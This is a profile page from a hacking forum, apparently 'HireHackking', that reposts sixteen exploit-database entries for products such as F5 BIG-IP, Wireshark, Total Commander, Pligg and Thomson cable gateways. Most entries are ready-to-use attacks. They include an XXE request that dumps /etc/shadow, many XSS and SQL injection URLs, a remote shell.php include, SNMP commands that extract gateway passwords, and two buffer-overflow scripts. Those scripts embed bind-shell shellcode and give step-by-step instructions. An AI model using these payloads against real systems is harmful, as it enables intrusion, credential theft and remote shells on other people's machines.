Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    F5 Networks BIG-IP - XML External Entity Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57496/info F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks. POST /sam/admin/vpe2/public/php/server.php HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 143 <?xml version="1.0" encoding='utf-8' ?> <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]> <message><dialogueType>&e;</dialogueType></message> The response includes the content of the file: <?xml version="1.0" encoding="utf-8"?> <message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client has sent unknown dialogueType ' root:--hash--:15490:::::: bin:*:15490:::::: daemon:*:15490:::::: adm:*:15490:::::: lp:*:15490:::::: mail:*:15490:::::: uucp:*:15490:::::: operator:*:15490:::::: nobody:*:15490:::::: tmshnobody:*:15490:::::: admin:--hash--:15490:0:99999:7:::
  2. HireHackking

    Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57514/info Perforce P4Web is prone to multiple cross site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Perforce P4Web versions 2011.1 and 2012.1 are vulnerable; other versions may also be affected. http://www.example.com/u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl= http://www.example.com/cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter http://www.example.com/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81 http://www.example.com/unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter http://www.example.com/filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter http://www.example.com/goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go http://www.example.com/bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter http://www.example.com/lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter http://www.example.com/Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter http://www.example.com/Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter http://www.example.com/UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter
  3. HireHackking

    DigiLIBE - Execution-After-Redirect Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57499/info DigiLIBE is prone to a remote information-disclosure vulnerability. Successful exploits may allow the attacker to bypass authentication and gain access to potentially sensitive information. This may aid in further attacks. DigiLIBE 3.4 is vulnerable; other versions may also be affected. http://www.example.com/[path]/configuration/general_configuration.html
  4. HireHackking

    gpEasy CMS - 'section' Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57522/info gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. gpEasy CMS 3.5.2 and prior versions are vulnerable. http://www.example.com//?cmd=new_section&section=%22%3%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
  5. HireHackking

    WordPress Theme Chocolate WP - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57541/info The Chocolate WP Theme for WordPress is prone to multiple security vulnerabilities. An attacker may leverage these issues to cause denial-of-service conditions, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1 http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 http://www.example.com/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php
  6. HireHackking

    Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pligg CMS 2.0.2 SQL injection # Date: 29-08-2015 # Exploit Author: jsass # Vendor Homepage: http://pligg.com # Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip # Version: 2.0.2 # Tested on: kali sana 2.0 ################ Q8 Gray Hat Team ################ SQLInjection File : load_data_for_search.php $search = new Search(); if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){ $pagesize = $_REQUEST['pagesize']; $start_up = $_REQUEST['start_up']; $limit = " LIMIT $start_up, $pagesize"; } if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){ $sql = $_REQUEST['sql']; $search->sql = $sql.$limit; } $fetch_link_summary = true; $linksum_sql = $sql.$limit; Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi} Type Injection : Boolean & Time Based Use SQLmap To Inject .. Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi} ################ Q8 Gray Hat Team ################ Great's To : sec4ever.com && alm3refh.com
  7. HireHackking

    Wireshark 1.12.7 - Division by Zero Crash (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC # Date: 02/09/2015 # Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard # Vendor Homepage: https://www.wireshark.org/ # Software Link: https://www.wireshark.org/download.html # Version: 1.12.7 # Tested on: Windows 7 # Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143 import os import subprocess import getpass drive=os.getenv("systemdrive") user=getpass.getuser() path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user) def wiresharkIsPresent(): ps=subprocess.check_output("tasklist") if "Wireshark.exe" in ps: return 1 else: return 0 def killWireshark(): try: res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T") return 1 except: return 0 if wiresharkIsPresent(): if killWireshark(): print "Wireshark is killed!" sploit=""" # Recent settings file for Wireshark 1.12.7. # # This file is regenerated each time Wireshark is quit # and when changing configuration profile. # So be careful, if you want to make manual changes here. # Main Toolbar show (hide). # TRUE or FALSE (case-insensitive). gui.toolbar_main_show: TRUE # Filter Toolbar show (hide). # TRUE or FALSE (case-insensitive). gui.filter_toolbar_show: TRUE # Wireless Settings Toolbar show (hide). # TRUE or FALSE (case-insensitive). gui.wireless_toolbar_show: FALSE # Show (hide) old AirPcap driver warning dialog box. # TRUE or FALSE (case-insensitive). gui.airpcap_driver_check_show: TRUE # Packet list show (hide). # TRUE or FALSE (case-insensitive). gui.packet_list_show: TRUE # Tree view show (hide). # TRUE or FALSE (case-insensitive). gui.tree_view_show: TRUE # Byte view show (hide). # TRUE or FALSE (case-insensitive). gui.byte_view_show: TRUE # Statusbar show (hide). # TRUE or FALSE (case-insensitive). gui.statusbar_show: TRUE # Packet list colorize (hide). # TRUE or FALSE (case-insensitive). gui.packet_list_colorize: TRUE # Timestamp display format. # One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE gui.time_format: RELATIVE # Timestamp display precision. # One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC gui.time_precision: AUTO # Seconds display format. # One of: SECONDS, HOUR_MIN_SEC gui.seconds_format: SECONDS # Zoom level. # A decimal number. gui.zoom_level: -10 # Bytes view. # A decimal number. gui.bytes_view: 0 # Main window upper (or leftmost) pane size. # Decimal number. gui.geometry_main_upper_pane: 440 # Main window middle pane size. # Decimal number. gui.geometry_main_lower_pane: 428 # Packet list column pixel widths. # Each pair of strings consists of a column format and its pixel width. column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285 # Last directory navigated to in File Open dialog. gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\ """ try: f=open(path,"w") f.write(sploit) f.close() print "Success!" except: print "Fail :("
  8. HireHackking

    PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57561/info The PHPWeby Free directory script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHPWeby Free directory script 1.2 is vulnerable; other versions may also be affected. fullname=Ping And Pong Is Interesting Game xD%5C&mail=sssssssssssssssssss&subject=,(select case((select mid(`pass`,1,1) from admin_area limit 1 offset 0)) when 0x32 then sleep(10) else 0 end) ,1,2,3,4)-- and 5!=('Advertising+Inquiry&message=TEST
  9. HireHackking

    Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849] Cable Modem Gateway # Google Dork: n/a # Date: 09/18/2015 # Exploit Author: Matt Dunlap # Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways # Software Link: n/a # Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR: 2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>> # Tested on: Ubuntu 14.04.3 # CVE : Not reported to vendor (yet) Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849] Cable Modem Gateway Affected Product: Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway NOTE: The model DWG850-4 is open to the same attack but doesn’t come with the remote administration enabled (no web interface, no telnet) Severity Rating: Important Impact: Username and password for the user interface as well as wireless network keys can be disclosed through SNMP. At the time of posting this there are 61,505 results on Shodan for this model. By default there are 2 open ports: 161 (snmp), 8080 (web administration) The default password of 4GIt3M has been set on every unit I’ve tested so far Description: The Thomson CableHome Gateway DWG849 Cable Modem Gateway product specifications include SNMP v2 & v3 under Network Management. The management information bases (MIBs) of various device subsystems on the DWG849 allows local\remote network users to discover user interface credentials and wireless network key values through simple SNMP requests for the value of these variables. Given the security authentication in SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the risk that the values can be disclosed through SNMP using the default read-only community “private”. Object Identifiers (OIDs): Make, Model, Software Version: 1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.3.0 Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M) 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 SSID and KEY 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32 1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32 Guest Network OIDs Other OIDs of interest include 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35 [POC] snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32 1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32 This issue has not been reported to the vendor.
  10. HireHackking

    Total Commander 8.52 (Windows 10) - Local Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: Un_N0n # Date of Testing: 19th September 2015 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe # Tested On : Windows 10 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called time.txt # Step 3: Copy the contents of time.txt file # Step 4: Now open Total Commander 8.52 # Step 5: Go To file > Change Attributes. # Step 6: In time field paste the contents of time.txt # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc file = open('time.txt' , 'wb'); buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS # msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d' buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1" "\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28" "\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c" "\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2" "\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a" "\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48" "\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91" "\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15" "\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e" "\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e" "\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd" "\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8" "\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b" "\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba" "\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01" "\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b" "\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf" "\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24" "\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc" "\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc" "\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42" "\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52" "\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30" "\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68") buffer += "\x90" *10 file.write(buffer) file.close()
  11. HireHackking

    Total Commander 8.52 - Local Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: Un_N0n # Date of Testing: 19th September 2015 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe # Tested On : Windows XP Service Pack 2 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called time.txt # Step 3: Copy the contents of time.txt file # Step 4: Now open Total Commander 8.52 # Step 5: Go To file > Change Attributes. # Step 6: In time field paste the contents of time.txt # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc file = open('time.txt' , 'w'); buffer = "\x90"*190 buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX buffer += "\x90"*(265- len(buffer)) buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX # bad characters - \x00\x0a\x0d # msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d' buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" "\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11" "\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69" "\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4" "\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30" "\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3" "\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94" "\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b" "\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4" "\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5" "\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1" "\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16" "\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51" "\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3" "\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06" "\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49" "\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65" "\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf" "\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb" "\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba" "\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08" "\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b" "\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c" "\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2") file.write(buffer) file.close()
  12. HireHackking

    iCart Pro - 'section' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57564/info iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. iCart Pro 4.0.1 is vulnerable; other versions may also be affected. http://www.example.com/forum/icart.php?do=editproduct&productid=19&section='
  13. HireHackking

    ADH-Web Server IP-Cameras - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    1. Adivisory Information Title: ADH-Web Server IP-Cameras Improper Access Restrictions EDB-ID: 38245 Advisory ID: OLSA-2015-0919 Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html Date published: 2015-09-19 Date of last update: 2016-02-15 Vendors contacted: Dedicated Micros 2. Vulnerability Information Class: Information Exposure [CWE-200] Impact: Access Control Bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: N/A 3. Vulnerability Description Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2]. Background: Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click. 4. Vulnerable Packages - SD Advanced Closed IPTV - SD Advanced - EcoSense - Digital Sprite 2 5. Technical Description [1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below: (401): http://<target_ip>/hdd0/logs (200): http://<target_ip>/hdd0/logs/log.txt > Most common logfiles: arc_log.txt bak.txt connect.txt log.txt seclog.log startup.txt DBGLOG.TXT access.txt security.txt [2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information: > DNS: http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0 > ftp master ftp console credentials: http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0 http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 (although the vast majority of servers have ftp/telnet with anonymous access allowed.) > alms http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0 > camconfig http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1 (includes, but is not limited to) This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors). 6. Vendor Information, Solutions and Workarounds The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon. 7. Credits These vulnerabilities has been discovered by Orwelllabs. 8. Report Timeline 2015-08-31: Vendor has been notified about the vulnerabilities (without details yet). 2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details. 2015-09-01: A email with technical details is sent to vendor. 2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems. 2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14). 2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212). Legal Notices +++++++++++++ The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. About Orwelllabs ++++++++++++++++ Orwelllabs is a security research lab interested in embedded device & webapp hacking. We aims to create some intelligence around this vast and confusing picture that is the Internet of things. -----BEGIN PGP PUBLIC KEY BLOCK----- mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf 55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN 95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965 AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK 6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30 MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37 =IZYl -----END PGP PUBLIC KEY BLOCK-----
  14. HireHackking

    Multiple Hunt CCTV - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57579/info Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. curl -v http://www.example.com/DVR.cfg | strings |grep -i USER
  15. HireHackking

    MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57602/info MiniUPnP is prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause denial-of-service conditions. MiniUPnP versions prior to 1.4 are vulnerable. M-SEARCH * HTTP/1.1 Host:239.255.255.250:1900 ST:uuid:schemas:device:MX:3< no CRLF >
  16. HireHackking

    Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
